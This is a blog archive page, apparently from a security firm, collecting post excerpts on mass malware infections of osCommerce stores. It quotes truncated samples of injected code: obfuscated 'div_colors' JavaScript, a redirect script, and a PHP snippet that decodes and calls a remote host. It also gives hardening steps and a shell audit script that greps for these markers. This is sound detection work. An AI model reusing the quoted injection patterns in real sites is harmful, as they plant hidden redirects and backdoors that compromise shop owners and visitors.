Non-Stop Attacks Against osCommerce – Time to Take Action

The malware attacks against osCommerce sites are still going at full force, and site owners have to take action to secure and update their sites as soon as possible. Think about it: with so many valuable targets (online stores) that are not updated and secured, why would they stop attacking now?

*If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it to check if it’s clean: Sucuri SiteCheck

Read More

Attacks against osCommerce sites – Spam / google_analytics_obh

It seems that the attacks against osCommerce are not going to stop any time soon. With so many valuable targets (online stores) that are not updated and secured, why would they?

*If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it here to check if it’s clean: Sucuri SiteCheck

After all the latest osCommerce malware (div_colors, CreateCSS, etc.), we’re seeing an old attack reemerging in full force and compromising thousands of sites.

The attack is the “__google_analytics_obh” one, which adds hidden links (for Blackhat SEO spam) to the sites. It has been happening for a while, but over the last few days it has grown to mass scale.

This is what shows up on a compromised site:

Read More

osCommerce malware: Cannot redeclare corelibrarieshandler

We have been posting for a while about attacks targeting and infecting thousands of osCommerce sites (CreateCSS, div_colors, etc) and the importance of keeping it updated and secure.

If you think things have been improving: just in the last few days, we started to see many of those hacked osCommerce sites generating errors when someone tries to access them:

Read More

Continuing attacks against osCommerce:

Busy week for osCommerce in terms of malware. First, the div_colors string, then, the CreateCSS string, and now, we are seeing thousands of osCommerce sites infected with a malware pointing to This is how it looks like in an infected site:

<script type="text/javascript">document.location = "…..tL2FkbWluLw=="

This javascript is generated by the following code added to the bottom of all PHP files in the server:

<?php if(!isset($tf['engine'])){$tf['engine']=1;$tf['s']=base64_decode('a2hjb2wuY29t');$tf['u']='http://'.$tf['s']…

Read More

The “div_colors” Malware Update

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and adds the following obfuscated code to the pages:

if (typeof(redef_colors)=="undefined") {
var div_colors = new Array("#4b8272", "#81787f", "#832f83", "#887f74", "#4c3183", "#748783", "#3e7970", "#857082", "#728178", "#7f8331", "#2f8281", "#724c31", "#778383", "#7f493e", "#3e7a84", "#82837e", "#40403d", "#727e7c", "#3e7982", "#3e7980", "#847481", "#883d7c", "#787d3d", "#7f777f", "#314d00");..

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {

Read More

Malware week: The div_colors, CreateCSS and others

We are starting to see an interesting trend regarding how the latest web-based malware is being distributed. Instead of heavily encoding the malicious code on the infected web sites, attackers are now trying to make it look like legitimate code.


For example, the div_colors malware that infected a lot of osCommerce sites looks like a JavaScript color picker. This is what it looks like on an infected site:

if (typeof(redef_colors)=="undefined") {

var div_colors = new Array("#4b8272", "#81787f", "#832f83", "#887f74", "#4c3183", "#748783", "#3e7970", "#857082", "#728178", "#7f8331", "#2f8281", "#724c31", "#778383", "#7f493e", "#3e7a84", "#82837e", "#40403d", "#727e7c", "#3e7982", "#3e7980", "#847481", "#883d7c", "#787d3d", "#7f777f", "#314d00");

Read More

Weekly malware update – 2010/Jan/14

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected with any of these issues, contact us at or visit to get help or if you want to share some information with us.

Astro (JS:431) – osCommerce attacks

For the last few weeks, this attack has been the most common, especially targeting osCommerce sites. The following code is added to the bottom of the infected pages:

Read More

osCommerce attacks and,, etc

We posted yesterday about a series of attacks against osCommerce sites using some Russian domains to push the malware (generally the fake AV). We also posted details on how to fix and secure osCommerce to protect against those:

However, they are not the only ones targeting osCommerce. There is another group using many .in web sites (always registered by Jennifer Hook – that are infecting thousands of sites too.

When they detect a vulnerable site (see previous post for details on that), they drop a backdoor, generally named google*.php, that allows them to manage the site remotely. You can see the full backdoor here (caught by our honeypots):

It is interesting that, in addition to giving full shell access to the attackers, it also uses to read the list of domains to use in the attack. Currently, these are the ones being used:

Read More

Continuing attacks against osCommerce sites

We are seeing an increase in the number of osCommerce sites hacked lately, and we recommend anyone using it to take precautions to avoid getting hacked and/or reinfected.

On most of the sites we’ve analyzed so far, the attackers used the file_manager.php vulnerability to hack the site.

If you’re using osCommerce, the first thing you have to do is install the latest version. Second, remove the file_manager.php file and then rename your admin directory to something else. Log in via FTP or SSH (recommended) to do so:

ftp> delete admin/file_manager.php
ftp> rename admin admin-random-folder-name
ftp> cd admin-random-folder-name/includes
ftp> get configure.php

Once you do that, modify your configure.php to point the admin folder to the new location.
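
An added example (not from the original posts): a POSIX shell audit that checks a document root for the hardening steps above and for the injected-code markers quoted in these posts. The function name, output labels and file-extension list are assumptions; a marker match only flags a file for manual review.

```shell
#!/bin/sh
# Audit an osCommerce document root (example code, not Sucuri's or osCommerce's).
# Paths and marker strings are the ones named in the posts on this page.

audit_oscommerce() {
    root=$1
    [ -d "$root" ] || { echo "not a directory: $root" >&2; return 2; }

    report=$(
        # 1. file_manager.php is the entry point the posts describe; it should be deleted.
        [ -f "$root/admin/file_manager.php" ] &&
            echo "RISK admin/file_manager.php is still present"

        # 2. The admin directory should no longer have its default name.
        [ -d "$root/admin" ] &&
            echo "RISK admin directory still uses the default name"

        # 3. Dropped backdoors are described as "generally named google*.php".
        find "$root" -type f -name 'google*.php' |
            sed 's/^/REVIEW possible backdoor name: /'

        # 4. Fixed-string search for the injected-code markers quoted in the posts.
        find "$root" -type f \( -name '*.php' -o -name '*.js' -o -name '*.htm*' \) \
            -exec grep -lF \
                -e 'div_colors' \
                -e 'CreateCSS' \
                -e '__google_analytics_obh' \
                -e 'corelibrarieshandler' \
                -e "\$tf['engine']" {} + |
            sed 's/^/INFECTED marker found in: /'
    )

    # Exit status 0 means nothing was flagged; 1 means at least one finding.
    [ -z "$report" ] && return 0
    printf '%s\n' "$report"
    return 1
}

# Run directly as: sh audit.sh /path/to/docroot
if [ "$#" -gt 0 ]; then
    audit_oscommerce "$1"
fi
```

A clean result only means none of these specific markers were found; the posts note the injected code changes between campaigns.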

Read More

Malware update: (and oscommerce)

Quick malware update: We are seeing many osCommerce sites infected with malware managed by, and a few others. All the domains involved are hosted at

These domains were registered by, which is also involved on other malicious activities (,,,etc).

The infected sites had a large encoded entry added to the file includes/header.php:


Which when decoded, calls to get what malware to present to the end user:

Read More